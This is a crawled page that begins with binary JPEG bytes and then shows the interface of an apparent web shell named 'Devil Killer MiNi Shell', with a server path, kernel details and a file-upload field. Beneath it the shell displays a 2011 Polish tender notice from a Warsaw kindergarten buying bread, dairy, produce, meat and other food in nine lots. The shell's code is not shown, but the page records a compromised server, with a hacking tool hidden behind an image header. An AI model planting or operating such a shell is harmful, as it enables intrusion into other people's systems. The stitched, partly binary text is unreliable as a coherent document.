JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111205/411622-N-2011.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów spożywczych z podziałem na 9 pakietów</b><br>
<b>Numer ogłoszenia: 411622 - 2011; data zamieszczenia: 05.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 14 , ul. Senatorska 24, 00-095 Warszawa, woj. mazowieckie, tel. 22 827 02 40, faks 22 827 02 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.p14w-wa.wikom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych z podziałem na 9 pakietów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych z podziałem na 9 pakietów - zgodnie ze SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.51.00.00-6, 15.53.00.00-2, 03.22.00.00-9, 03.14.25.00-3, 15.10.00.00-9, 15.13.11.30-5, 03.31.10.00-2, 15.89.60.00-5, 15.80.00.00-6, 41.11.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.p14w-wa.wikom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Nr 14, ul. Senatorska 24, 00-095 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2011 godzina 10:00, miejsce: Przedszkole Nr 14, ul. Senatorska 24, 00-095 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb biały duży , krojony -  masa netto 580g - krojony, świeży	szt.	720,
Chleb razowy z ziarnem  - masa netto 500, świeży	szt.	250,
Chleb razowy -  masa 500g, świeży	szt.	250,
Chleb tostowy pszenny lub z ziarnem	szt.	35,
Chałka - masa netto 300g, świeża	szt.	80,
Bułka wrocławska -  masa netto - 280g, świeża	szt.	800,
Bułeczki pszenne kajzerki  - 45g, świeże	szt.	1920,
Groszek ptysiowy - 25 dkg	kg	5,
Drożdżówka - rogalik  -  masa 55 g, świeża	szt.	1920,
Drożdżówka z budyniem - masa 80g, świeża	szt.	540,
Drożdżówka jogurtowa lub z jagodami lub z jabłkiem - masa 80g	szt.	540,
Wyroby cukiernicze na wagę - masa netto kg	kg	15,
Drożdżówki różne -masa netto 80 g, świeża	szt.	540,
Ciasto drożdżowe 300 - 350g	kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Napój z mleka fermentowanego z żywymi kulturami bakterii, owocowy, opakowanie - buteleczka 100 ml 	szt.	8500,
Jogurt owocowy - kawałki owoców na dole, kremowy jogurt na górze - opakowanie - kubek prostokątny  125 g	szt.	2000,
Serek wzbogacony o witaminę D, opakowanie - kubeczek 50 g	szt.	2000,
Puszysty serek do smarowania, opakowanie - kubek 150 g	szt.	100,
Jogurt pitny naturalny -  opakowanie 1 litr	szt.	50,
Masło extra o zawartości tłuszczu 82% bez dodatku tłuszczów roślinnych  - opakowanie folia aluminiowa z nadrukiem - 200 g	szt.	2000,
Masło roślinne opakowanie - kubek 250 g	szt.	40,
Mleko spożywcze, pasteryzowane, homogenizowane - zawartość tłuszczu 3,2% opakowanie - folia  1l - w tym ? ilości z dotowanego Programu Agencji Rynku Rolnego Szklanka mleka. 	litr	5000,
Ser topiony kremowy -  40 % tł. w 100 g, prostokąty	szt.	200,
Ser żółty łagodny, zawartość tłuszczu 45%, sera w serze 90%, dotowany z Programu  Agencji Rynku Rolnego Szklanka mleka	kg	110,
Śmietanka do ciast i deserów 30% tłuszczu,  wartość energetyczna w 100g produktu - 290 kcal, składnik dodatkowy: stabilizator - karagen ,  opakowanie - kartonik - 500ml,	szt.	40,
Śmietana do zupy zaw. tł. 18%, opakowanie - kubek 400 ml	szt.	360,
Twaróg półtłusty, kl.I , zawartość tłuszczu 3,5%  - opakowanie folia o pojemności 250g,	kg	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.00.00-6, 15.53.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> WARZYWA, OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Arbuz - Klasa I lub II wg Rozporządzenie Komisji  WE nr 1093/97	kg	200,
Banany- Klasa I lub II, wg Rozporządzenie Komisji WE NR 2257/94	kg	720,
Botwina w pęczkach - świeża, sprężysta, bez śladów nadpsucia	szt.	50,
Brokuły -  świeże o różyczkach zwartych , intensywnie zielonych, bez pleśni i  nadpsucia	szt.	144,
Brzoskwinie lub morele -  dojrzałe, nie przejrzałe, bez śladów obicia i nadpsucia, kl. I	kg	200,
Buraki -  czerwone, okrągłe, konsumpcyjne, wielkość średnia	kg	300,
Cebula zwyczajna - wielkość średnia	kg	250,
Cytryny - soczyste o gładkiej skórce bez śladów nadpsucia, kl. I	kg	150,
Czosnek, duże główki o lekko fioletowym zabarwieniu, śwież y bez cech nadpsucia	szt.	50,
Fasolka szparagowa długa, żółta, bez łyka, bez śladów nadpsucia	kg	40,
Gruszki - soczyste - typu konferencja lub klapsa, bez cech nadpsucia	kg	350,
Jabłka -soczyste, słodko winne - typu cortland, ligol, champion, delikates, rubin, jonagored - nie obite i bez cech nadpsucia o średniej wielkości	kg	1000,
Kalafior świeży, różyczki białe, zwarte	szt.	160,
Kapusta czerwona - główka -  2-2,5kg, główka zwarta, ścisła, zdrowa, bez śladów nadpsucia	kg	30,
Kapusta kiszona młoda, jasna, nie przekwaszona, o zapachu delikatnym, opakowanie - wiaderko plastikowe 5kg	kg	200,
Kapusta pekińska - główka - około 1 - 1,5kg, zwarta, zdrowa, bez cech nadpsucia	kg	350,
Kapusta włoska -wielkość jednej główki - 2 kg, świeża, zdrowa, bez cech nadpsucia	kg	170,
Kiwi - sztuki na palecie, nie w koszyczku, twarde, dojrzałe, bez cech nadpsucia, kl. I 	szt.	1100,
Koperek zielony  - pęczki, świeży, nie zwiędły, o wadze określonej sezonowo, o barwie intensywnej ciemno zielonej i właściwym zapachu, bez cech nadpsucia.	szt.	300,
Mandarynki bezpestkowe, soczyste, nie wyschnięte; skórka gładka, łatwo odchodząca; zdrowe, bez cech nadpsucia 	kg	600,
Marchew, młoda, karotka, umyta, bez cech nadpsucia, średniej wielkości	kg	1000,
Natka pietruszki świeża - pęczki, nie zwiędła,  o wadze określonej sezonowo, zdrowy ciemno-zielony kolor, bez cech nadpsucia	szt.	250,
Nektarynki - dojrzałe, średniej wielkości, nie obite, kl. I, bez cech nadpsucia i pleśni	szt.	300,
Ogórki kiszone, nie przekwaszone, twarde, bez cech nadpsucia, opakowanie - wiaderko plastikowe 6kg	kg	300,
Ogórki świeże - krótkie lub węże, szklarniowe lub gruntowe - w zależności od sezonu, twarde, zdrowe-nie nadpsute, kl. I	kg	200,
Papryka czerwona - dojrzała, świeża, jędrna, dojrzała, bez cech nadpsucia, kl. I	kg	400,
Pietruszka - zdrowy korzeń bez brązowych przebarwień wewnątrz, nie zwiędła, wielkość średnia; umyta, bez cech nadpsucia	kg	300,
Pieczarki świeże , bez plam  i cech nadpsucia	kg	80,
Pomarańcza, typu Nowelina, gładka, jasna, cienka skórka, bez cech nadpsucia kl. I	kg	200,
Pomidor - mięsisty, świeży, czysty, czerwony-wybarwiony, produkt polski, w opakowaniu 6kg, kl. I extra, bez cech nadpsucia	kg	400,
Por - zdrowy, zwarty, bez cech nadpsucia, 	kg	200,
Rzodkiewka - pęczki - czerwona okrągła, młoda, świeża, słodka - nie piekąca, bez cech nadpsucia	szt.	300,
Sałata świeża, intensywnie zielona 	szt.	300,
Sałata lodowa świeża bez cech nadpsucia	szt.	100,
Seler - biały, umyty, wielkość średnia, bez cech nadpsucia	kg	300,
Szaron ( kaki ) dojrzały, bez cech nadpsucia	szt.	250,
Szczypior  z małą cebulką -(dymka) pęczki -wielkość sezonowa, bez cech nadpsucia, sprężysty	szt.	100,
Szczypiorek - cienki - pęczki -wielkość sezonowa, zdrowy, sprężysty bez cech nadpsucia	szt.	200,
Śliwki typu - węgierka, Stanley, wybarwione, w dojrzałości konsumpcyjnej, odchodząca od pestki, bez cech nadpsucia 	kg	200,
Truskawka, odmiana konsumpcyjna polska, zdrowa, dojrzała,  wybarwiona, bez cech nadpsucia 	kg	200,
Winogrona ciemne  - kiście zagraniczne - słodkie, bez pleśni i cech nadpsucia, kl. I	kg	50,
Winogrona jasne - kiście zagraniczne, słodkie, bez cech nadpsucia, kl. I 	kg	700,
Ziemniaki młode- irga konsumpcyjna, umyta, zdrowa, nie nadmrożona, skórka bez zielonych zabarwień, bez kiełkujących oczek,   wielkość średnia, bez cech nadpsucia	kg	5 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja świeże, nie starsze niż 7 dni od daty pakowania, o oznaczeniu: 3 - jaja z chowu klatkowego, A, L - duże 63 - 73 g	szt.	6000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> MIĘSO, WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z indyka w przedziale wagowym 1 kg -1,5kg,świeży, bez skóry, bez kości -nie rozmrażany	kg.	100,
Udziec z indyka, bez skóry, bez kości, świeży- nie rozmrażany 50-70 dkg	kg.	100,
Piersi z kurczaka, świeże nie rozmrażane, pojedyncze	kg.	100,
Kurczak świeży cały, patroszony, 1,5- 2 kg- nie rozmrażany	kg.	60,
Udka kurczaka świeże, nie rozmrażane	kg.	120,
Cielęcina zadnia, świeża- nie rozmrażana kawałki 1-1,5 kg	kg.	50,
Łopatka wołowa z młodych sztuk, bez skóry, bez kości, bez wierzchniej warstwy tłuszczu, świeże nie rozmrażane kawałki po 1- 1,5 kg	kg.	100,
Szynka wieprzowa bez kości, bez tłuszczu,
Kawałki wielkości 1- 1,5 kg, świeże, nie rozmrażane 	kg.	50,
Schab środkowy bez kości, o średnicy nie większej niż 10cm, świeży, nie rozmrażany, kawałki 1,5- 2 kg	kg.	200,

Łopatka wieprzowa, bez skóry, bez kości, bez wierzchniej warstwy tłuszczu, świeża nie rozmrażana; kawałki ok.1- 1,5 kg	kg.	200,
Wołowe z udźca, bez kości kl.I ,świeże, nie rozmrażane, z młodych sztuk 1- 1,5 kg	kg.	130,
Porcje rosołowe 	kg.	150,

Polędwica sopocka, wysoko wydajna, mięso wieprzowe 74%	kg.	100,
Kiełbasa krakowska parzona, grubo rozdrobniona, wysoko wydajna, mięso wieprzowe 70,90%	kg.	60,
Kiełbasa krakowska podsuszana, grubo rozdrobniona, wysoko wydajna, mięso wieprzowe 96%	kg.	60,
Kiełbasa żywiecka, średnio rozdrobniona, podsuszana, wędzona, 100g gotowego produktu uzyskano ze 121 g mięsa wieprzowego	kg.	60,
Szynka wiejska- wędzonka parzona, mięso wieprzowe 83%	kg.	80,
Kiełbasa cienka typu podwawelska, toruńska, mięso wieprzowe 84,9%	kg.	50,
Kabanosy, kiełbasa średnio rozdrobniona, wędzona, parzona, podsuszana, 100 g gotowego wyrobu uzyskano z 97 g mięsa wieprzowego i 18 g mięsa drobiowego	kg.	60,
Salami- mięso wieprzowe 64%, mięso wołowe 32%	kg.	60,
Parówki wieprzowe odtłuszczone, mięso wieprzowe 60%, mięso drobiowe 3%	kg.	100,
Filet z indyka pieczony, produkt blokowy grubo rozdrobniony, mięso z indyka 72,5%	kg.	80,
Kiełbasa lisiecka	kg.	30,
Pasztet tradycyjny, domowy	kg.	20,
Szynka Prezesa, z komina, 78% mięsa wieprzowego	kg.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dorsz plamiak - płaty, nie więcej niż 3% glazury technologicznej, opakowanie SHP	kg	110,
Mintaj - płaty, nie więcej niż 3% glazury technologicznej, opakowanie SHP	kg	110,
Makrela wędzona, świeża, duże tuszki, zapakowana hermetycznie 	kg	24,
Łosoś wędzony na zimno, plastrowany,  zapakowany próżniowo na tacce, masa 100 g	szt.	100,
Tuńczyk w sosie własnym, jasne mięso, duże kawałki, opakowanie puszka min. 170 g	szt.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.31.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuły mrożone-  opakowanie torba foliowa o pojemności 2500g	kg	60,
Brukselka - opakowanie torba foliowa o pojemności 2500 g	kg	60,
Fasolka szparagowa zielona cięta, oczyszczona - opakowanie torba foliowa o pojemności  2500 g	kg	30,
Fasolka szparagowa żółta cięta, oczyszczona - opakowanie torba foliowa o pojemności  2500 g	kg	30,
Kalafior mrożony różyczki -  opakowanie torba foliowa o pojemności  2500 g	kg	60,
Marchewka z groszkiem  -  opakowanie  torba foliowa o pojemności  2500 g	kg	40,
Marchew kostka - opakowanie torba foliowa o
 pojemności 2500 g	kg	40,
Marchewka mini - opakowanie torba foliowa o
 pojemności 2500 g	kg	30,
Mieszanka kompotowa  -  opakowanie  torba foliowa o pojemności  2500 g	kg	200,
Mieszanka warzywna ( kalafior, brokuły, marchew ) - opakowanie torba foliowa  2500 g	kg	40,
Czarna porzeczka - opakowanie torba foliowa 2500 g	kg	20,
Truskawka - opakowanie torba foliowa  2500 g	kg	80,
Maliny - opakowanie torba foliowa 2500 g	kg	20,
Frytki - opakowanie  torba foliowa 2500 g	kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PRODUKTY OGÓLNOSPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas kawałki w lekkim syropie, opakowanie -  puszka 580 g	szt.	100,
Ananas plastry w  lekkim syropie, opakowanie - puszka 3035 g	szt.	50,
Wafelek z nadzieniem mlecznym w czekoladzie opakowanie 37 g	szt.	200,
Bazylia suszona - ziele suszone otarte - op. 10g	szt.	30,
Biszkopty opakowanie 140 g	szt.	160,
Budyń Waniliowy z cukrem 1,3 kg
	szt.	15,
Bułka tarta opakowanie 450 g	kg	144,
Brzoskwinie połówki w lekkim syropie, opakowanie 2600 g	szt.	50,
Ciasteczka w kształcie misia z nadzieniem	szt.	300,
Cukier puder opakowanie 500 g	kg	10,
Cukier biały- drobny kryształ  - paczkowany 1kg	kg	500,
Cukier wanilinowy 16g	szt.	60,
Dżem truskawkowy niskosłodzony , wsad owocowy ~40g owoców/100g produktu, op. słoik 300g	szt.	150,
Dżem wiśniowy niskosłodzony, wsad owocowy  ~40g owoców / 100 g produktu, op. -  słoik 300 g	szt.	100,
Fasola biała drobna - op.3 kg	kg	30,
Groch łuskany - połówki - op. 3 kg	kg	30,
Herbata  ziołowa - Mięta - opakowanie - 20 torebek x 2 g	szt.	50,
Herbata owocowa - ( hibiskus, aronia, jabłko, jeżyny, owoc dzikiej róży, skórki cytrynowe, owoc brzoskwini, owoc jagody, owoc truskawki ) - opakowanie - 20 
torebek x 2 g	szt. 	50,
Herbata czarna ekspresowa, opakowanie - 100 torebek x 2 g	szt.	8,
Herbatniki PETIT BEURRE - tradycyjna receptura, polecane do wypieków,  op.100g,	op.	300,
Kawa rozpuszczalna zbożowa - op. 150g	szt.	40,
Kakao rozpuszczalne z witaminami, opakowanie 600 g	szt.	50,
Kasza gryczana prażona cała - opakowanie 0,9 kg	kg	30,
Kasza jęczmienna perłowa, biała, łamana drobna - op. 3 kg	kg	25,
Kasza manna - op. 1kg	kg	15,
Kasza pęczak, biały - op. 0,9 kg	kg	30,
Kasza kuskus	kg	20,
Ketchup łagodny, opakowanie 1000 g	szt.	15,
Kisiel z cukrem, różne smaki, opakowanie 
1,3 kg	szt.	15,
Koncentrat pomidorowy, zawartość ekstraktu 30% + -2% - opakowanie-słoik - 950 g	szt. 	100,
Krem do smarowania z orzechami laskowymi - zawartość  13%, opakowanie - słoik  500 g - wartość: energetyczna w 100g produktu 530 kcal, białka 6,4	szt.	40,
Kukurydza konserwowa puszka 340 g po odsączeniu masa netto 280 g	szt.	100,
Kwasek cytrynowy 20 g	szt.	25,
Liść laurowy -  ziele suche - op. 6g	szt. 	80,
Majeranek - ziele suche otarte - op. 8g	szt. 	100,
Majonez dekoracyjny, opakowanie - słoik - 600ml	szt. 	80,
Makaron  nitki nr  2 - op. 0,5 kg 	kg	75,
Makaron spaghetti nr 4 -  op. 0,5 kg	kg	30,
Makaron świderki Nr 19  - op. 0,5 kg	kg	60,
Mąka pszenna TYP 480 - op. 1kg	kg	350,
Mąka ziemniaczana - op. 1kg	kg	20,
Miód naturalny  pszczeli - wielokwiatowy nektarowy  - opakowanie - słoik 400g - wartość energetyczna w 100g produktu 1334kJ/319kcal	szt.	50,
Napój herbaciany 1,3 kg	szt.	20,
Musztarda, opakowanie 1l	szt.	10,
Olej rafinowany rzepakowy z pierwszego tłoczenia - op. 1l 	szt.	200,
